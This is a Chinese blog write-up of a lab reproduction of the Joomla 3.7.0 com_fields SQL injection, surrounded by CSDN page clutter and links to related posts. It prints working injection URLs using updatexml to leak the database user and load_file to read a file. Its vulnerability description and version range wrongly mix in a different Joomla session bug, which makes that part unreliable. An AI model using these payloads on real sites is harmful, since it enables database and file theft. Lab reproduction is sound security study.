Joomla 3.7.0 SQL注入漏洞

最新推荐文章于 2024-10-09 16:12:14 发布

xzhome

最新推荐文章于 2024-10-09 16:12:14 发布

阅读量2.3k

点赞数 2

分类专栏： CMS

本文链接：https://blog.csdn.net/qq_48985780/article/details/121654759

版权

Joomla SQL注入漏洞利用远程命令执行安全修复

关键词由CSDN通过智能技术生成

CMS 专栏收录该内容

11 篇文章 1 订阅

订阅专栏

Joomla 3.7.0 SQL注入漏洞

漏洞描述：

漏洞本质是Joomla对session数据处理不当，未经授权的攻击者可以发送精心构造的恶意 HTTP 请求，获取服务器权限，实现远程命令执行。

影响范围：

Joomla 3.0.0-3.4.6

环境搭建：

这里采用安鸾渗透实战地址

漏洞复现：

打开之后页面

安装完成后，构造payload

/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1)

看到返回了用户

构造读取文件的payload

0x2f666c6167是/flag得hex编码

/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,load_file(0x2f666c6167)),1)

得到flag

漏洞修复：

升级最新版完整安装包以及升级补丁包

下载地址

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

xzhome

关注关注

2
点赞
踩
3

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

Joomla 3.7.0 (CVE-2017-8917) 漏洞测试

sun1296825481的博客

12-11

2992

Joomla 3.7.0 (CVE-2017-8917) 漏洞测试本漏洞测试使用的是虚拟机Ubuntu 18.04 LTS 一、环境搭建 1、docker的安装 .更新apt包索引 sudo apt-get update .安装以下包以使apt可以通过HTTPS使用存储库（repository） sudo apt-get install -y apt-transport-http...

Joomla 3.7.0 SQL注入漏洞 CVE-2017-8917

weixin_51387754的博客

12-01

1117

漏洞简介 com_fields组件出现漏洞，com_fields组件是在3.7版本添加的，如果你使用此版本，将受到影响，并应尽快更新。这个组件可以公开访问，意味着任何能访问你站点的用户都可以发起攻击漏洞复现 (root????guiltyfet)-[/home/guiltyfet/vulhub/joomla] └─# cd CVE-2017-8917 ┌──(root????guiltyfet)-[/home/guiltyfet/vulhub/joomla/CVE-2017-8917] └─# dock

参与评论您还未登录，请先登录后发表或查看评论

Joomla 3.7.0 (CVE-2017-8917) SQL注入漏洞环境

weixin_45653478的博客

05-17

684

Joomla是一个基于PHP的内容管理系统（CMS），广泛应用于各类网站。2017年，Joomla 3.7.0版本被发现存在SQL注入漏洞（CVE-2017-8917），攻击者可以利用该漏洞对数据库进行未授权查询或操作，可能导致数据泄露、篡改甚至删除。

Joomla存在未授权访问漏洞

最新发布

m0_73334898的博客

10-09

166

nuclei批量poc。

Joomla3.7.0 (CVE-2017-8917) SQL注入漏洞复现

weixin_42786460的博客

09-01

1543

Joomla3.7.0 (CVE-2017-8917) SQL注入漏洞复现

Joomla SQL注入漏洞(CVE-2017-8917)

weixin_45630387的博客

03-18

705

根据vulhub文档直接访问http://your-ip:8080/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1)，即可看到SQL报错信息。参考vulhub中文文档：https://github.com/vulhub/vulhub/blob/master/joomla/CVE-2017-8917/README.zh-cn.md。

Joomla-3.7.0

cgjil的博客

09-09

205

这个漏洞影响所有使用joomla 3.7版本及以下内容管理系统的网站，攻击者可以使用利用这个漏洞获取数据库的内容，包括用户数据和session数据。得到这些数据后，攻击者可以利用session登录网站后台，查看敏感信息，还可以修改原密码。这个漏洞影响所有使用joomla 3.7版本及以下内容管理系统的网站，攻击者可以使用利用这个漏洞获取数据库的内容，包括用户数据和session数据。3.7.0搭建][https://vulapps.evalbug.com/j_joomla_2/]根据以下链接进行搭建。

CVE 2017-8917 Joomla3.7 Core com_fields组件sql注入漏洞复现

BROTHERYY的博客

10-19

2447

1. 漏洞描述漏洞编号： CVE-2017-8917 危害等级：危急漏洞简述：本漏洞出现在3.7.0新引入的一个组件“com_fields”，这个组件任何人都可以访问，无需登陆验证。由于对请求数据过滤不严导致sql注入，sql注入对导致数据库中的敏感信息泄漏。影响版本： Joomla!3.7.0 Core 2. 漏洞介绍这个漏洞出现在3.7.0新引入的一个组件“com_fields”，这个组件任何人都可以访问，无需登陆验证。由于对请求数据过滤不严导致sql 注入，sql注入对导致数据库中的敏感信息泄

Joomla 3.7.0 (CVE-2017-8917) SQL注入漏洞

huayimy的博客

12-30

1120

Joomla 3.7.0 (CVE-2017-8917) SQL注入漏洞，com_fields组件，启动docker，安装mysql数据库

利用Vulnhub复现漏洞 - Joomla 3.7.0 (CVE-2017-8917) SQL注入漏洞环境

JiangBuLiu的博客

07-12

4083

@[TOC](Joomla 3.7.0 (CVE-2017-8917) SQL注入漏洞环境) Vulnhub官方复现教程 https://vulhub.org/#/environments/joomla/CVE-2017-8917/ 漏洞原理 com_fields组件出现漏洞，com_fields组件是在3.7版本添加的，如果你使用此版本，将受到影响，并应尽快更新。这个组件可以公开访问，意味着任何...

CMS Joomla SQL 注入漏洞（CVE-2017-8917 ）

CuiXY's Blog

01-18

898

0x01 原理 1.Joomla是内容管理的网站程序，也就是CMS。漏洞原理是com_fields组件，对请求数据过滤不严谨，从而导致sql注入。这个就是有问题的代码，可以看出sql根本没有过滤，通过对list中的fullordering这个字段的精心构造，就可以完成sql攻击 2.追根溯源，网站程序Joomla的com_fields启动时，会调用display这个方法 3.display这个...

Joomla! Core SQL注入漏洞(CVE-2018-8045)

Darklord.W

11-17

1050

Joomla! Core SQL注入漏洞(CVE-2018-8045) 漏洞描述： joomla!3.5.0-3.8.5版本对sql语句内的变量缺少类型转换，导致User Notes列表视图内SQL注入漏洞影响版本： joomla!3.5.0-3.8.5 漏j洞复现：首先，安装joomla!如3.8.5 然后，访问http://ip:port/YourJoomlaPath/administrator/index.php?option=com_users&view=notes,然后按下图

Joomla内核SQL注入漏洞（CVE-2018-8045）

huayimy的博客

12-30

697

Joomla内核SQL注入漏洞（CVE-2018-8045），登录账号密码后会显示报错

Joomla!3.7.0 Core SQL注入漏洞(更新漏洞环境)

Fly_鹏程万里

04-03

3005

前言 Joomla！是世界上最受欢迎的内容管理系统（CMS）解决方案之一。它可以让用户自定义构建网站实现强大的在线应用程序。据不完全统计互联网上超过3％的网站运行Joomla！，同时它占有全球9%以上的CMS市场份额。截止至2016年11月，Joomla！的总下载量超过7800万次。目前Joomla！官方还提供了超过7800个扩展插件（含免费、收费插件）及其他的可用资源可供下载。漏洞等级...

Joomla_3.7.0-Stable-Full_Package.zip

04-29

CVE-2017-8917是一个具体的漏洞，可能涉及到Joomla CMS的某个安全问题，可能是SQL注入、跨站脚本攻击或其他类型的网络安全威胁。用户被鼓励下载并分析这个包，以了解如何识别和修复此类安全漏洞。在提供的标签中，...

Joomla对象注入漏洞分析

weixin_30475039的博客

12-06

245

漏洞简介 jooomla 1.5 到 3.4.5 的所有版本中存在反序列化对象造成对象注入的漏洞，漏洞利用无须登录，直接在前台即可执行任意PHP代码。Joomla 安全团队紧急发布了 Joomla 3.4.6 版本，修复了这个高危 0day 漏洞。漏洞原理漏洞存在于反序列化session的过程中，我们可以控制session的值，而且没有过滤我们构造的语句，通过mysql截断原理，在...